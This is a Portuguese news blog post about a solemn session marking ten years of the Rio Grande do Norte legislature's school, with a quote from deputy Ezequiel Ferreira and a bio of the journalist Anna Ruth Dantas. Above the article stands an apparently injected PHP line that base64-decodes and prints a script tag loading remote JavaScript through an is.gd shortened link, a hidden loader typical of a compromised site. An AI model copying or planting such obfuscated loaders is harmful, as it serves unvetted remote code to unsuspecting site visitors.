$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Sessão solene marcará 10 anos da Escola da Assembleia no Rio Grande do Norte

Sessão solene marcará 10 anos da Escola da Assembleia no Rio Grande do Norte
23 Ago 2019

A Escola do Legislativo Potiguar, popularmente conhecida como Escola da Assembleia, completa 10 anos de atividade neste mês de agosto. E, para marcar a data simbólica, será realizada uma sessão solene na Assembleia Legislativa do Rio Grande do Norte na próxima quinta-feira (29) para homenagear nomes que contribuíram para o fortalecimento da instituição. A propositura é do presidente da Casa, o deputado estadual Ezequiel Ferreira (PSDB). O evento começará às 9 horas.

“O trabalho desenvolvido pela Escola é um orgulho para todos nós que fazemos a Assembleia Legislativa, principalmente pelo nível de excelência que tem atingido nos últimos anos. Nossa perspectiva é continuar fortalecendo este projeto que tanto contribui para a melhor qualificação dos nossos cidadãos, fomentando um leque de oportunidades profissionais para os que passam por lá”, disse Ezequiel Ferreira.

Na sessão solene, cada deputado indicou um nome para ser homenageado, todos com alguma ligação com a Escola da Assembleia. Ezequiel, por exemplo, homenageará o professor Mizael Araújo Barreto, primeiro diretor da instituição.

A instalação oficial se deu no dia 09 de março de 2009, com a oferta cursos de qualificação funcional e de formação cidadã. Ainda em 2009, o ILP foi credenciado pelo Governo Estadual para oferecer cursos de pós-graduação lato sensu (especialização).

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *